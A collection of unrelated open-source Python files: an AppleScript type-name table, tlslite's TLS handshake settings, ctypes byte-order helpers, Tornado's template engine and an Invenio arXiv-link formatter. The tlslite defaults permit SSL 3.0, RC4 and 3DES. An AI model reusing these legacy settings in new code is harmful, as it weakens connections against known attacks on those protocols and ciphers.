'ls ' : list_or_string,
'nmbr' : number,
'tue ' : Tuesday,
'vers' : version,
'dec ' : December,
'sqkm' : square_kilometres,
'obj ' : reference,
'vect' : vector,
'wkdy' : weekday,
'sun ' : Sunday,
'itxt' : international_text,
'scnd' : seconds,
'cRGB' : RGB_color,
'kmtr' : kilometres,
'sutx' : styled_Unicode_text,
'msng' : missing_value,
'metr' : metres,
'ns ' : number_or_string,
'list' : list,
'llst' : linked_list,
'doub' : real,
'encs' : encoded_string,
'lr ' : list_or_record,
'mon ' : Monday,
'sep ' : September,
'****' : anything,
'prop' : property,
'kfrm' : reference_form,
'cobj' : item,
'gram' : grams,
'reco' : record,
'undf' : empty_ae_name_,
'enum' : constant,
'sqmi' : square_miles,
'rdat' : data,
'utxt' : Unicode_text,
'yard' : yards,
'cyrd' : cubic_yards,
'lbs ' : pounds,
'ccmt' : cubic_centimetres,
'ctxt' : text,
'jul ' : July,
'cmet' : cubic_metres,
'STXT' : styled_text,
'nds ' : number_2c__date_or_text,
'feet' : feet,
'feb ' : February,
'degc' : degrees_Celsius,
'kprs' : keystroke,
'long' : integer,
'degf' : degrees_Fahrenheit,
'lrs ' : list_2c__record_or_text,
'ldt ' : date,
'degk' : degrees_Kelvin,
'cmtr' : centimetres,
'psct' : writing_code,
'sf ' : alias_or_string,
'citl' : writing_code_info,
'citm' : text_item,
'mach' : machine,
'type' : type_class,
'prep' : preposition,
'wed ' : Wednesday,
'case' : upper_case,
'mar ' : March,
'sqft' : square_feet,
'nov ' : November,
'qrts' : quarts,
'alis' : alias,
'jan ' : January,
'mnth' : month,
'jun ' : June,
'aug ' : August,
'styl' : styled_Clipboard_text,
'galn' : gallons,
'cuin' : cubic_inches,
'fri ' : Friday,
'snd ' : sound,
'pcls' : class_,
'kgrm' : kilograms,
'scpt' : script,
'litr' : litres,
'bool' : boolean,
'sqrm' : square_metres,
'inch' : inches,
'cha ' : character,
'apr ' : April,
'ozs ' : ounces,
'capp' : app,
'hand' : handler,
'cstr' : C_string,
'thu ' : Thursday,
'sqyd' : square_yards,
'cfet' : cubic_feet,
'sat ' : Saturday,
'fss ' : file_specification,
}
class StdSuites(Text_Suite_Events,
AppleScript_Suite_Events,
Standard_Suite_Events,
Macintosh_Connectivity_Clas_Events,
QuickDraw_Graphics_Suite_Events,
QuickDraw_Graphics_Suppleme_Events,
Required_Suite_Events,
Table_Suite_Events,
Type_Names_Suite_Events,
aetools.TalkTo):
_signature = 'ascr'
_moduleName = 'StdSuites'
|
mit
|
nirmeshk/oh-mainline
|
vendor/packages/gdata/src/gdata/tlslite/HandshakeSettings.py
|
359
|
6364
|
"""Class for setting handshake parameters."""
from constants import CertificateType
from utils import cryptomath
from utils import cipherfactory
class HandshakeSettings:
"""This class encapsulates various parameters that can be used with
a TLS handshake.
@sort: minKeySize, maxKeySize, cipherNames, certificateTypes,
minVersion, maxVersion
@type minKeySize: int
@ivar minKeySize: The minimum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, or Diffie-Hellman
parameters smaller than this length, an alert will be
signalled. The default is 1023.
@type maxKeySize: int
@ivar maxKeySize: The maximum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, or Diffie-Hellman
parameters larger than this length, an alert will be signalled.
The default is 8193.
@type cipherNames: list
@ivar cipherNames: The allowed ciphers, in order of preference.
The allowed values in this list are 'aes256', 'aes128', '3des', and
'rc4'. If these settings are used with a client handshake, they
determine the order of the ciphersuites offered in the ClientHello
message.
If these settings are used with a server handshake, the server will
choose whichever ciphersuite matches the earliest entry in this
list.
NOTE: If '3des' is used in this list, but TLS Lite can't find an
add-on library that supports 3DES, then '3des' will be silently
removed.
The default value is ['aes256', 'aes128', '3des', 'rc4'].
@type certificateTypes: list
@ivar certificateTypes: The allowed certificate types, in order of
preference.
The allowed values in this list are 'x509' and 'cryptoID'. This
list is only used with a client handshake. The client will
advertise to the server which certificate types are supported, and
will check that the server uses one of the appropriate types.
NOTE: If 'cryptoID' is used in this list, but cryptoIDlib is not
installed, then 'cryptoID' will be silently removed.
@type minVersion: tuple
@ivar minVersion: The minimum allowed SSL/TLS version.
This variable can be set to (3,0) for SSL 3.0, (3,1) for
TLS 1.0, or (3,2) for TLS 1.1. If the other party wishes to
use a lower version, a protocol_version alert will be signalled.
The default is (3,0).
@type maxVersion: tuple
@ivar maxVersion: The maximum allowed SSL/TLS version.
This variable can be set to (3,0) for SSL 3.0, (3,1) for
TLS 1.0, or (3,2) for TLS 1.1. If the other party wishes to
use a higher version, a protocol_version alert will be signalled.
The default is (3,2). (WARNING: Some servers may (improperly)
reject clients which offer support for TLS 1.1. In this case,
try lowering maxVersion to (3,1)).
"""
def __init__(self):
self.minKeySize = 1023
self.maxKeySize = 8193
self.cipherNames = ["aes256", "aes128", "3des", "rc4"]
self.cipherImplementations = ["cryptlib", "openssl", "pycrypto",
"python"]
self.certificateTypes = ["x509", "cryptoID"]
self.minVersion = (3,0)
self.maxVersion = (3,2)
#Filters out options that are not supported
def _filter(self):
other = HandshakeSettings()
other.minKeySize = self.minKeySize
other.maxKeySize = self.maxKeySize
other.cipherNames = self.cipherNames
other.cipherImplementations = self.cipherImplementations
other.certificateTypes = self.certificateTypes
other.minVersion = self.minVersion
other.maxVersion = self.maxVersion
if not cipherfactory.tripleDESPresent:
other.cipherNames = [e for e in self.cipherNames if e != "3des"]
if len(other.cipherNames)==0:
raise ValueError("No supported ciphers")
try:
import cryptoIDlib
except ImportError:
other.certificateTypes = [e for e in self.certificateTypes \
if e != "cryptoID"]
if len(other.certificateTypes)==0:
raise ValueError("No supported certificate types")
if not cryptomath.cryptlibpyLoaded:
other.cipherImplementations = [e for e in \
self.cipherImplementations if e != "cryptlib"]
if not cryptomath.m2cryptoLoaded:
other.cipherImplementations = [e for e in \
other.cipherImplementations if e != "openssl"]
if not cryptomath.pycryptoLoaded:
other.cipherImplementations = [e for e in \
other.cipherImplementations if e != "pycrypto"]
if len(other.cipherImplementations)==0:
raise ValueError("No supported cipher implementations")
if other.minKeySize<512:
raise ValueError("minKeySize too small")
if other.minKeySize>16384:
raise ValueError("minKeySize too large")
if other.maxKeySize<512:
raise ValueError("maxKeySize too small")
if other.maxKeySize>16384:
raise ValueError("maxKeySize too large")
for s in other.cipherNames:
if s not in ("aes256", "aes128", "rc4", "3des"):
raise ValueError("Unknown cipher name: '%s'" % s)
for s in other.cipherImplementations:
if s not in ("cryptlib", "openssl", "python", "pycrypto"):
raise ValueError("Unknown cipher implementation: '%s'" % s)
for s in other.certificateTypes:
if s not in ("x509", "cryptoID"):
raise ValueError("Unknown certificate type: '%s'" % s)
if other.minVersion > other.maxVersion:
raise ValueError("Versions set incorrectly")
if not other.minVersion in ((3,0), (3,1), (3,2)):
raise ValueError("minVersion set incorrectly")
if not other.maxVersion in ((3,0), (3,1), (3,2)):
raise ValueError("maxVersion set incorrectly")
return other
def _getCertificateTypes(self):
l = []
for ct in self.certificateTypes:
if ct == "x509":
l.append(CertificateType.x509)
elif ct == "cryptoID":
l.append(CertificateType.cryptoID)
else:
raise AssertionError()
return l
|
agpl-3.0
|
nyasara/azuremono-docker
|
IronPython-2.7.4/Lib/ctypes/_endian.py
|
51
|
2101
|
######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
import sys
from ctypes import *
_array_type = type(c_int * 3)
def _other_endian(typ):
"""Return the type with the 'other' byte order. Simple types like
c_int and so on already have __ctype_be__ and __ctype_le__
attributes which contain the types, for more complicated types
only arrays are supported.
"""
try:
return getattr(typ, _OTHER_ENDIAN)
except AttributeError:
if type(typ) == _array_type:
return _other_endian(typ._type_) * typ._length_
raise TypeError("This type does not support other endian: %s" % typ)
class _swapped_meta(type(Structure)):
def __setattr__(self, attrname, value):
if attrname == "_fields_":
fields = []
for desc in value:
name = desc[0]
typ = desc[1]
rest = desc[2:]
fields.append((name, _other_endian(typ)) + rest)
value = fields
super(_swapped_meta, self).__setattr__(attrname, value)
################################################################
# Note: The Structure metaclass checks for the *presence* (not the
# value!) of a _swapped_bytes_ attribute to determine the bit order in
# structures containing bit fields.
if sys.byteorder == "little":
_OTHER_ENDIAN = "__ctype_be__"
LittleEndianStructure = Structure
class BigEndianStructure(Structure):
"""Structure with big endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
elif sys.byteorder == "big":
_OTHER_ENDIAN = "__ctype_le__"
BigEndianStructure = Structure
class LittleEndianStructure(Structure):
"""Structure with little endian byte order"""
__metaclass__ = _swapped_meta
_swappedbytes_ = None
else:
raise RuntimeError("Invalid byteorder")
|
mit
|
duramato/SickRage
|
tornado/template.py
|
142
|
31156
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A simple template system that compiles templates to Python code.
Basic usage looks like::
t = template.Template("<html>{{ myvalue }}</html>")
print t.generate(myvalue="XXX")
`Loader` is a class that loads templates from a root directory and caches
the compiled templates::
loader = template.Loader("/home/btaylor")
print loader.load("test.html").generate(myvalue="XXX")
We compile all templates to raw Python. Error-reporting is currently... uh,
interesting. Syntax for the templates::
### base.html
<html>
<head>
<title>{% block title %}Default title{% end %}</title>
</head>
<body>
<ul>
{% for student in students %}
{% block student %}
<li>{{ escape(student.name) }}</li>
{% end %}
{% end %}
</ul>
</body>
</html>
### bold.html
{% extends "base.html" %}
{% block title %}A bolder title{% end %}
{% block student %}
<li><span style="bold">{{ escape(student.name) }}</span></li>
{% end %}
Unlike most other template systems, we do not put any restrictions on the
expressions you can include in your statements. ``if`` and ``for`` blocks get
translated exactly into Python, so you can do complex expressions like::
{% for student in [p for p in people if p.student and p.age > 23] %}
<li>{{ escape(student.name) }}</li>
{% end %}
Translating directly to Python means you can apply functions to expressions
easily, like the ``escape()`` function in the examples above. You can pass
functions in to your template just like any other variable
(In a `.RequestHandler`, override `.RequestHandler.get_template_namespace`)::
### Python code
def add(x, y):
return x + y
template.execute(add=add)
### The template
{{ add(1, 2) }}
We provide the functions `escape() <.xhtml_escape>`, `.url_escape()`,
`.json_encode()`, and `.squeeze()` to all templates by default.
Typical applications do not create `Template` or `Loader` instances by
hand, but instead use the `~.RequestHandler.render` and
`~.RequestHandler.render_string` methods of
`tornado.web.RequestHandler`, which load templates automatically based
on the ``template_path`` `.Application` setting.
Variable names beginning with ``_tt_`` are reserved by the template
system and should not be used by application code.
Syntax Reference
----------------
Template expressions are surrounded by double curly braces: ``{{ ... }}``.
The contents may be any python expression, which will be escaped according
to the current autoescape setting and inserted into the output. Other
template directives use ``{% %}``. These tags may be escaped as ``{{!``
and ``{%!`` if you need to include a literal ``{{`` or ``{%`` in the output.
To comment out a section so that it is omitted from the output, surround it
with ``{# ... #}``.
``{% apply *function* %}...{% end %}``
Applies a function to the output of all template code between ``apply``
and ``end``::
{% apply linkify %}{{name}} said: {{message}}{% end %}
Note that as an implementation detail apply blocks are implemented
as nested functions and thus may interact strangely with variables
set via ``{% set %}``, or the use of ``{% break %}`` or ``{% continue %}``
within loops.
``{% autoescape *function* %}``
Sets the autoescape mode for the current file. This does not affect
other files, even those referenced by ``{% include %}``. Note that
autoescaping can also be configured globally, at the `.Application`
or `Loader`.::
{% autoescape xhtml_escape %}
{% autoescape None %}
``{% block *name* %}...{% end %}``
Indicates a named, replaceable block for use with ``{% extends %}``.
Blocks in the parent template will be replaced with the contents of
the same-named block in a child template.::
<!-- base.html -->
<title>{% block title %}Default title{% end %}</title>
<!-- mypage.html -->
{% extends "base.html" %}
{% block title %}My page title{% end %}
``{% comment ... %}``
A comment which will be removed from the template output. Note that
there is no ``{% end %}`` tag; the comment goes from the word ``comment``
to the closing ``%}`` tag.
``{% extends *filename* %}``
Inherit from another template. Templates that use ``extends`` should
contain one or more ``block`` tags to replace content from the parent
template. Anything in the child template not contained in a ``block``
tag will be ignored. For an example, see the ``{% block %}`` tag.
``{% for *var* in *expr* %}...{% end %}``
Same as the python ``for`` statement. ``{% break %}`` and
``{% continue %}`` may be used inside the loop.
``{% from *x* import *y* %}``
Same as the python ``import`` statement.
``{% if *condition* %}...{% elif *condition* %}...{% else %}...{% end %}``
Conditional statement - outputs the first section whose condition is
true. (The ``elif`` and ``else`` sections are optional)
``{% import *module* %}``
Same as the python ``import`` statement.
``{% include *filename* %}``
Includes another template file. The included file can see all the local
variables as if it were copied directly to the point of the ``include``
directive (the ``{% autoescape %}`` directive is an exception).
Alternately, ``{% module Template(filename, **kwargs) %}`` may be used
to include another template with an isolated namespace.
``{% module *expr* %}``
Renders a `~tornado.web.UIModule`. The output of the ``UIModule`` is
not escaped::
{% module Template("foo.html", arg=42) %}
``UIModules`` are a feature of the `tornado.web.RequestHandler`
class (and specifically its ``render`` method) and will not work
when the template system is used on its own in other contexts.
``{% raw *expr* %}``
Outputs the result of the given expression without autoescaping.
``{% set *x* = *y* %}``
Sets a local variable.
``{% try %}...{% except %}...{% else %}...{% finally %}...{% end %}``
Same as the python ``try`` statement.
``{% while *condition* %}... {% end %}``
Same as the python ``while`` statement. ``{% break %}`` and
``{% continue %}`` may be used inside the loop.
"""
from __future__ import absolute_import, division, print_function, with_statement
import datetime
import linecache
import os.path
import posixpath
import re
import threading
from tornado import escape
from tornado.log import app_log
from tornado.util import ObjectDict, exec_in, unicode_type
try:
from cStringIO import StringIO # py2
except ImportError:
from io import StringIO # py3
_DEFAULT_AUTOESCAPE = "xhtml_escape"
_UNSET = object()
class Template(object):
"""A compiled template.
We compile into Python from the given template_string. You can generate
the template from variables with generate().
"""
# note that the constructor's signature is not extracted with
# autodoc because _UNSET looks like garbage. When changing
# this signature update website/sphinx/template.rst too.
def __init__(self, template_string, name="<string>", loader=None,
compress_whitespace=None, autoescape=_UNSET):
self.name = name
if compress_whitespace is None:
compress_whitespace = name.endswith(".html") or \
name.endswith(".js")
if autoescape is not _UNSET:
self.autoescape = autoescape
elif loader:
self.autoescape = loader.autoescape
else:
self.autoescape = _DEFAULT_AUTOESCAPE
self.namespace = loader.namespace if loader else {}
reader = _TemplateReader(name, escape.native_str(template_string))
self.file = _File(self, _parse(reader, self))
self.code = self._generate_python(loader, compress_whitespace)
self.loader = loader
try:
# Under python2.5, the fake filename used here must match
# the module name used in __name__ below.
# The dont_inherit flag prevents template.py's future imports
# from being applied to the generated code.
self.compiled = compile(
escape.to_unicode(self.code),
"%s.generated.py" % self.name.replace('.', '_'),
"exec", dont_inherit=True)
except Exception:
formatted_code = _format_code(self.code).rstrip()
app_log.error("%s code:\n%s", self.name, formatted_code)
raise
def generate(self, **kwargs):
"""Generate this template with the given arguments."""
namespace = {
"escape": escape.xhtml_escape,
"xhtml_escape": escape.xhtml_escape,
"url_escape": escape.url_escape,
"json_encode": escape.json_encode,
"squeeze": escape.squeeze,
"linkify": escape.linkify,
"datetime": datetime,
"_tt_utf8": escape.utf8, # for internal use
"_tt_string_types": (unicode_type, bytes),
# __name__ and __loader__ allow the traceback mechanism to find
# the generated source code.
"__name__": self.name.replace('.', '_'),
"__loader__": ObjectDict(get_source=lambda name: self.code),
}
namespace.update(self.namespace)
namespace.update(kwargs)
exec_in(self.compiled, namespace)
execute = namespace["_tt_execute"]
# Clear the traceback module's cache of source data now that
# we've generated a new template (mainly for this module's
# unittests, where different tests reuse the same name).
linecache.clearcache()
return execute()
def _generate_python(self, loader, compress_whitespace):
buffer = StringIO()
try:
# named_blocks maps from names to _NamedBlock objects
named_blocks = {}
ancestors = self._get_ancestors(loader)
ancestors.reverse()
for ancestor in ancestors:
ancestor.find_named_blocks(loader, named_blocks)
writer = _CodeWriter(buffer, named_blocks, loader, ancestors[0].template,
compress_whitespace)
ancestors[0].generate(writer)
return buffer.getvalue()
finally:
buffer.close()
def _get_ancestors(self, loader):
ancestors = [self.file]
for chunk in self.file.body.chunks:
if isinstance(chunk, _ExtendsBlock):
if not loader:
raise ParseError("{% extends %} block found, but no "
"template loader")
template = loader.load(chunk.name, self.name)
ancestors.extend(template._get_ancestors(loader))
return ancestors
class BaseLoader(object):
"""Base class for template loaders.
You must use a template loader to use template constructs like
``{% extends %}`` and ``{% include %}``. The loader caches all
templates after they are loaded the first time.
"""
def __init__(self, autoescape=_DEFAULT_AUTOESCAPE, namespace=None):
"""``autoescape`` must be either None or a string naming a function
in the template namespace, such as "xhtml_escape".
"""
self.autoescape = autoescape
self.namespace = namespace or {}
self.templates = {}
# self.lock protects self.templates. It's a reentrant lock
# because templates may load other templates via `include` or
# `extends`. Note that thanks to the GIL this code would be safe
# even without the lock, but could lead to wasted work as multiple
# threads tried to compile the same template simultaneously.
self.lock = threading.RLock()
def reset(self):
"""Resets the cache of compiled templates."""
with self.lock:
self.templates = {}
def resolve_path(self, name, parent_path=None):
"""Converts a possibly-relative path to absolute (used internally)."""
raise NotImplementedError()
def load(self, name, parent_path=None):
"""Loads a template."""
name = self.resolve_path(name, parent_path=parent_path)
with self.lock:
if name not in self.templates:
self.templates[name] = self._create_template(name)
return self.templates[name]
def _create_template(self, name):
raise NotImplementedError()
class Loader(BaseLoader):
"""A template loader that loads from a single root directory.
"""
def __init__(self, root_directory, **kwargs):
super(Loader, self).__init__(**kwargs)
self.root = os.path.abspath(root_directory)
def resolve_path(self, name, parent_path=None):
if parent_path and not parent_path.startswith("<") and \
not parent_path.startswith("/") and \
not name.startswith("/"):
current_path = os.path.join(self.root, parent_path)
file_dir = os.path.dirname(os.path.abspath(current_path))
relative_path = os.path.abspath(os.path.join(file_dir, name))
if relative_path.startswith(self.root):
name = relative_path[len(self.root) + 1:]
return name
def _create_template(self, name):
path = os.path.join(self.root, name)
with open(path, "rb") as f:
template = Template(f.read(), name=name, loader=self)
return template
class DictLoader(BaseLoader):
"""A template loader that loads from a dictionary."""
def __init__(self, dict, **kwargs):
super(DictLoader, self).__init__(**kwargs)
self.dict = dict
def resolve_path(self, name, parent_path=None):
if parent_path and not parent_path.startswith("<") and \
not parent_path.startswith("/") and \
not name.startswith("/"):
file_dir = posixpath.dirname(parent_path)
name = posixpath.normpath(posixpath.join(file_dir, name))
return name
def _create_template(self, name):
return Template(self.dict[name], name=name, loader=self)
class _Node(object):
def each_child(self):
return ()
def generate(self, writer):
raise NotImplementedError()
def find_named_blocks(self, loader, named_blocks):
for child in self.each_child():
child.find_named_blocks(loader, named_blocks)
class _File(_Node):
def __init__(self, template, body):
self.template = template
self.body = body
self.line = 0
def generate(self, writer):
writer.write_line("def _tt_execute():", self.line)
with writer.indent():
writer.write_line("_tt_buffer = []", self.line)
writer.write_line("_tt_append = _tt_buffer.append", self.line)
self.body.generate(writer)
writer.write_line("return _tt_utf8('').join(_tt_buffer)", self.line)
def each_child(self):
return (self.body,)
class _ChunkList(_Node):
def __init__(self, chunks):
self.chunks = chunks
def generate(self, writer):
for chunk in self.chunks:
chunk.generate(writer)
def each_child(self):
return self.chunks
class _NamedBlock(_Node):
def __init__(self, name, body, template, line):
self.name = name
self.body = body
self.template = template
self.line = line
def each_child(self):
return (self.body,)
def generate(self, writer):
block = writer.named_blocks[self.name]
with writer.include(block.template, self.line):
block.body.generate(writer)
def find_named_blocks(self, loader, named_blocks):
named_blocks[self.name] = self
_Node.find_named_blocks(self, loader, named_blocks)
class _ExtendsBlock(_Node):
def __init__(self, name):
self.name = name
class _IncludeBlock(_Node):
def __init__(self, name, reader, line):
self.name = name
self.template_name = reader.name
self.line = line
def find_named_blocks(self, loader, named_blocks):
included = loader.load(self.name, self.template_name)
included.file.find_named_blocks(loader, named_blocks)
def generate(self, writer):
included = writer.loader.load(self.name, self.template_name)
with writer.include(included, self.line):
included.file.body.generate(writer)
class _ApplyBlock(_Node):
def __init__(self, method, line, body=None):
self.method = method
self.line = line
self.body = body
def each_child(self):
return (self.body,)
def generate(self, writer):
method_name = "_tt_apply%d" % writer.apply_counter
writer.apply_counter += 1
writer.write_line("def %s():" % method_name, self.line)
with writer.indent():
writer.write_line("_tt_buffer = []", self.line)
writer.write_line("_tt_append = _tt_buffer.append", self.line)
self.body.generate(writer)
writer.write_line("return _tt_utf8('').join(_tt_buffer)", self.line)
writer.write_line("_tt_append(_tt_utf8(%s(%s())))" % (
self.method, method_name), self.line)
class _ControlBlock(_Node):
def __init__(self, statement, line, body=None):
self.statement = statement
self.line = line
self.body = body
def each_child(self):
return (self.body,)
def generate(self, writer):
writer.write_line("%s:" % self.statement, self.line)
with writer.indent():
self.body.generate(writer)
# Just in case the body was empty
writer.write_line("pass", self.line)
class _IntermediateControlBlock(_Node):
def __init__(self, statement, line):
self.statement = statement
self.line = line
def generate(self, writer):
# In case the previous block was empty
writer.write_line("pass", self.line)
writer.write_line("%s:" % self.statement, self.line, writer.indent_size() - 1)
class _Statement(_Node):
def __init__(self, statement, line):
self.statement = statement
self.line = line
def generate(self, writer):
writer.write_line(self.statement, self.line)
class _Expression(_Node):
def __init__(self, expression, line, raw=False):
self.expression = expression
self.line = line
self.raw = raw
def generate(self, writer):
writer.write_line("_tt_tmp = %s" % self.expression, self.line)
writer.write_line("if isinstance(_tt_tmp, _tt_string_types):"
" _tt_tmp = _tt_utf8(_tt_tmp)", self.line)
writer.write_line("else: _tt_tmp = _tt_utf8(str(_tt_tmp))", self.line)
if not self.raw and writer.current_template.autoescape is not None:
# In python3 functions like xhtml_escape return unicode,
# so we have to convert to utf8 again.
writer.write_line("_tt_tmp = _tt_utf8(%s(_tt_tmp))" %
writer.current_template.autoescape, self.line)
writer.write_line("_tt_append(_tt_tmp)", self.line)
class _Module(_Expression):
def __init__(self, expression, line):
super(_Module, self).__init__("_tt_modules." + expression, line,
raw=True)
class _Text(_Node):
def __init__(self, value, line):
self.value = value
self.line = line
def generate(self, writer):
value = self.value
# Compress lots of white space to a single character. If the whitespace
# breaks a line, have it continue to break a line, but just with a
# single \n character
if writer.compress_whitespace and "<pre>" not in value:
value = re.sub(r"([\t ]+)", " ", value)
value = re.sub(r"(\s*\n\s*)", "\n", value)
if value:
writer.write_line('_tt_append(%r)' % escape.utf8(value), self.line)
class ParseError(Exception):
"""Raised for template syntax errors."""
pass
class _CodeWriter(object):
def __init__(self, file, named_blocks, loader, current_template,
compress_whitespace):
self.file = file
self.named_blocks = named_blocks
self.loader = loader
self.current_template = current_template
self.compress_whitespace = compress_whitespace
self.apply_counter = 0
self.include_stack = []
self._indent = 0
def indent_size(self):
return self._indent
def indent(self):
class Indenter(object):
def __enter__(_):
self._indent += 1
return self
def __exit__(_, *args):
assert self._indent > 0
self._indent -= 1
return Indenter()
def include(self, template, line):
self.include_stack.append((self.current_template, line))
self.current_template = template
class IncludeTemplate(object):
def __enter__(_):
return self
def __exit__(_, *args):
self.current_template = self.include_stack.pop()[0]
return IncludeTemplate()
def write_line(self, line, line_number, indent=None):
if indent is None:
indent = self._indent
line_comment = ' # %s:%d' % (self.current_template.name, line_number)
if self.include_stack:
ancestors = ["%s:%d" % (tmpl.name, lineno)
for (tmpl, lineno) in self.include_stack]
line_comment += ' (via %s)' % ', '.join(reversed(ancestors))
print(" " * indent + line + line_comment, file=self.file)
class _TemplateReader(object):
def __init__(self, name, text):
self.name = name
self.text = text
self.line = 1
self.pos = 0
def find(self, needle, start=0, end=None):
assert start >= 0, start
pos = self.pos
start += pos
if end is None:
index = self.text.find(needle, start)
else:
end += pos
assert end >= start
index = self.text.find(needle, start, end)
if index != -1:
index -= pos
return index
def consume(self, count=None):
if count is None:
count = len(self.text) - self.pos
newpos = self.pos + count
self.line += self.text.count("\n", self.pos, newpos)
s = self.text[self.pos:newpos]
self.pos = newpos
return s
def remaining(self):
return len(self.text) - self.pos
def __len__(self):
return self.remaining()
def __getitem__(self, key):
if type(key) is slice:
size = len(self)
start, stop, step = key.indices(size)
if start is None:
start = self.pos
else:
start += self.pos
if stop is not None:
stop += self.pos
return self.text[slice(start, stop, step)]
elif key < 0:
return self.text[key]
else:
return self.text[self.pos + key]
def __str__(self):
return self.text[self.pos:]
def _format_code(code):
lines = code.splitlines()
format = "%%%dd %%s\n" % len(repr(len(lines) + 1))
return "".join([format % (i + 1, line) for (i, line) in enumerate(lines)])
def _parse(reader, template, in_block=None, in_loop=None):
body = _ChunkList([])
while True:
# Find next template directive
curly = 0
while True:
curly = reader.find("{", curly)
if curly == -1 or curly + 1 == reader.remaining():
# EOF
if in_block:
raise ParseError("Missing {%% end %%} block for %s" %
in_block)
body.chunks.append(_Text(reader.consume(), reader.line))
return body
# If the first curly brace is not the start of a special token,
# start searching from the character after it
if reader[curly + 1] not in ("{", "%", "#"):
curly += 1
continue
# When there are more than 2 curlies in a row, use the
# innermost ones. This is useful when generating languages
# like latex where curlies are also meaningful
if (curly + 2 < reader.remaining() and
reader[curly + 1] == '{' and reader[curly + 2] == '{'):
curly += 1
continue
break
# Append any text before the special token
if curly > 0:
cons = reader.consume(curly)
body.chunks.append(_Text(cons, reader.line))
start_brace = reader.consume(2)
line = reader.line
# Template directives may be escaped as "{{!" or "{%!".
# In this case output the braces and consume the "!".
# This is especially useful in conjunction with jquery templates,
# which also use double braces.
if reader.remaining() and reader[0] == "!":
reader.consume(1)
body.chunks.append(_Text(start_brace, line))
continue
# Comment
if start_brace == "{#":
end = reader.find("#}")
if end == -1:
raise ParseError("Missing end expression #} on line %d" % line)
contents = reader.consume(end).strip()
reader.consume(2)
continue
# Expression
if start_brace == "{{":
end = reader.find("}}")
if end == -1:
raise ParseError("Missing end expression }} on line %d" % line)
contents = reader.consume(end).strip()
reader.consume(2)
if not contents:
raise ParseError("Empty expression on line %d" % line)
body.chunks.append(_Expression(contents, line))
continue
# Block
assert start_brace == "{%", start_brace
end = reader.find("%}")
if end == -1:
raise ParseError("Missing end block %%} on line %d" % line)
contents = reader.consume(end).strip()
reader.consume(2)
if not contents:
raise ParseError("Empty block tag ({%% %%}) on line %d" % line)
operator, space, suffix = contents.partition(" ")
suffix = suffix.strip()
# Intermediate ("else", "elif", etc) blocks
intermediate_blocks = {
"else": set(["if", "for", "while", "try"]),
"elif": set(["if"]),
"except": set(["try"]),
"finally": set(["try"]),
}
allowed_parents = intermediate_blocks.get(operator)
if allowed_parents is not None:
if not in_block:
raise ParseError("%s outside %s block" %
(operator, allowed_parents))
if in_block not in allowed_parents:
raise ParseError("%s block cannot be attached to %s block" % (operator, in_block))
body.chunks.append(_IntermediateControlBlock(contents, line))
continue
# End tag
elif operator == "end":
if not in_block:
raise ParseError("Extra {%% end %%} block on line %d" % line)
return body
elif operator in ("extends", "include", "set", "import", "from",
"comment", "autoescape", "raw", "module"):
if operator == "comment":
continue
if operator == "extends":
suffix = suffix.strip('"').strip("'")
if not suffix:
raise ParseError("extends missing file path on line %d" % line)
block = _ExtendsBlock(suffix)
elif operator in ("import", "from"):
if not suffix:
raise ParseError("import missing statement on line %d" % line)
block = _Statement(contents, line)
elif operator == "include":
suffix = suffix.strip('"').strip("'")
if not suffix:
raise ParseError("include missing file path on line %d" % line)
block = _IncludeBlock(suffix, reader, line)
elif operator == "set":
if not suffix:
raise ParseError("set missing statement on line %d" % line)
block = _Statement(suffix, line)
elif operator == "autoescape":
fn = suffix.strip()
if fn == "None":
fn = None
template.autoescape = fn
continue
elif operator == "raw":
block = _Expression(suffix, line, raw=True)
elif operator == "module":
block = _Module(suffix, line)
body.chunks.append(block)
continue
elif operator in ("apply", "block", "try", "if", "for", "while"):
# parse inner body recursively
if operator in ("for", "while"):
block_body = _parse(reader, template, operator, operator)
elif operator == "apply":
# apply creates a nested function so syntactically it's not
# in the loop.
block_body = _parse(reader, template, operator, None)
else:
block_body = _parse(reader, template, operator, in_loop)
if operator == "apply":
if not suffix:
raise ParseError("apply missing method name on line %d" % line)
block = _ApplyBlock(suffix, line, block_body)
elif operator == "block":
if not suffix:
raise ParseError("block missing name on line %d" % line)
block = _NamedBlock(suffix, block_body, template, line)
else:
block = _ControlBlock(contents, line, block_body)
body.chunks.append(block)
continue
elif operator in ("break", "continue"):
if not in_loop:
raise ParseError("%s outside %s block" % (operator, set(["for", "while"])))
body.chunks.append(_Statement(contents, line))
continue
else:
raise ParseError("unknown operator: %r" % operator)
|
gpl-3.0
|
SDSG-Invenio/invenio
|
invenio/modules/formatter/format_elements/bfe_arxiv_link.py
|
13
|
1776
|
# This file is part of Invenio.
# Copyright (C) 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Links to arXiv"""
from cgi import escape
from invenio.base.i18n import gettext_set_language
def format_element(bfo, tag="037__", target="_blank"):
"""
Extracts the arXiv preprint information and
presents it as a direct link towards arXiv.org
"""
_ = gettext_set_language(bfo.lang)
potential_arxiv_ids = bfo.fields(tag)
arxiv_id = ""
for potential_arxiv_id in potential_arxiv_ids:
if potential_arxiv_id.get('9') == 'arXiv' and potential_arxiv_id.get('a', '').startswith('arXiv:'):
arxiv_id = potential_arxiv_id['a'][len('arXiv:'):]
return '<a href="http://arxiv.org/abs/%s" target="%s" alt="%s">%s</a>' % (
escape(arxiv_id, True),
escape(target, True),
escape(_("This article on arXiv.org"), True),
escape(arxiv_id))
return ""
